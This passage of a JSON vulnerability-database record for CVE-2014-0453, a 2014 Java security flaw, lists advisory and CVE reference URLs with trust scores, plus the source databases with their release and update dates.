"https://www.ibm.com/support/docview.wss?uid=swg21674530" }, { "trust": 1.8, "url": "http://www.debian.org/security/2014/dsa-2912" }, { "trust": 1.8, "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0413" }, { "trust": 1.8, "url": "https://access.redhat.com/errata/rhsa-2014:0414" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2014-0675.html" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2014-0685.html" }, { "trust": 1.8, "url": "http://secunia.com/advisories/58415" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59022" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59023" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59071" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59082" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59104" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59194" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59250" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59255" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59307" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59324" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59436" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59653" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59675" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59722" }, { "trust": 1.8, "url": "http://secunia.com/advisories/59733" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60003" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60111" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60117" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60498" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60574" }, { "trust": 1.8, "url": "http://secunia.com/advisories/60580" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61050" }, { "trust": 1.8, "url": "http://secunia.com/advisories/61264" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2187-1" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2191-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10698" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852974709252\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140852886808946\u0026w=2" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0453" }, { "trust": 0.8, "url": "http://www.ipa.go.jp/security/ciadr/vul/20140416-jre.html" }, { "trust": 0.8, "url": "http://www.jpcert.or.jp/at/2014/at140017.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0453" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0446" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0429" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2412" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0451" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2414" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2398" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0458" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0452" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0460" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0461" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0453" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1876" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0456" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0457" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2403" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2397" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0459" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2413" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0455" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0454" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2402" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2421" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2427" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2423" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6629" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6954" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2427.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.4, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.4, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0458.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.4, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.4, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0449" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2409" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2401" }, { "trust": 0.3, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0432" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0448" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0459.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0454.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2397.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2413.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.2, "url": "https://rhn.redhat.com/errata/rhsa-2014-0406.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2403.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-0455.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-2402.html" }, { "trust": 0.2, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2420" }, { "trust": 0.2, "url": "http://www.debian.org/security/faq" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10698" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852886808946\u0026amp;w=2" }, { "trust": 0.1, "url": "http://marc.info/?l=bugtraq\u0026amp;m=140852974709252\u0026amp;w=2" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-0453" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2187-1/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0432.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0413.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2422.html" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0455" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2409" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4266" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4219" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4209" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4263" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6468" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4247" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6511" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4265" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6513" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6504" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2402" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4221" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6527" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4227" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4252" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4244" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4262" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2490" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4208" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6492" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6512" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4264" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6466" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4288" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2483" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4223" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2428" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6502" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4268" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4218" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4220" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2410" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6506" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2413" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6515" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5887" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0878.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5910" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0982.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0417" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5907" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0376" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0368" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0428" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#low" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0422" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0415.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5889.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5884" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0375.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0423" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0423.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5878.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0376.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0410" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0410.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5889" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0424" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5907.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0373.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0416" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0373" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5888" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5899" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0403" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5896" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0387" }, { "trust": 0.1, "url": "http://www.hp.com/java" }, { "trust": 0.1, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2403" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0461" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0452" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0455" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1876" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0456" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2397" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2421" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://blog.fuseyism.com/index.php/2014/04/16/security-icedtea-2-4-7-for-openjdk-7-released/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2413" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2402" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2412" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2414" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0460" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0429" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0454" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2423" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2427" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0458" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0451" }, { "trust": 0.1, "url": "http://advisories.mageia.org/mgasa-2014-0189.html" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0446" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0459" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0457" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2398" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0508.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2428" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0462" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2405" } ], "sources": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "126494" }, { "db": "PACKETSTORM", "id": "126631" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-67946" }, { "db": "VULMON", "id": "CVE-2014-0453" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "126200" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "126494" }, { "db": "PACKETSTORM", "id": "126631" }, { "db": "PACKETSTORM", "id": "126320" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2014-04-16T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2014-04-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2014-04-16T20:42:08", "db": "PACKETSTORM", "id": "126182" }, { "date": "2014-04-17T22:02:41", "db": "PACKETSTORM", "id": "126200" }, { "date": "2015-02-16T17:24:02", "db": "PACKETSTORM", "id": "130400" }, { "date": "2014-07-29T22:17:21", "db": "PACKETSTORM", "id": "127655" }, { "date": "2014-08-20T15:19:26", "db": "PACKETSTORM", "id": "127938" }, { "date": "2014-05-19T03:11:59", "db": "PACKETSTORM", "id": "126664" }, { "date": "2014-05-06T00:17:25", "db": "PACKETSTORM", "id": "126494" }, { "date": "2014-05-15T21:38:43", "db": "PACKETSTORM", "id": "126631" }, { "date": "2014-04-25T17:49:43", "db": "PACKETSTORM", "id": "126320" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2014-04-16T01:55:09.713000", "db": "NVD", "id": "CVE-2014-0453" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67946" }, { "date": "2020-09-08T00:00:00", "db": "VULMON", "id": "CVE-2014-0453" }, { "date": "2015-12-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "date": "2020-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-268" }, { "date": "2024-11-21T02:02:09.460000", "db": "NVD", "id": 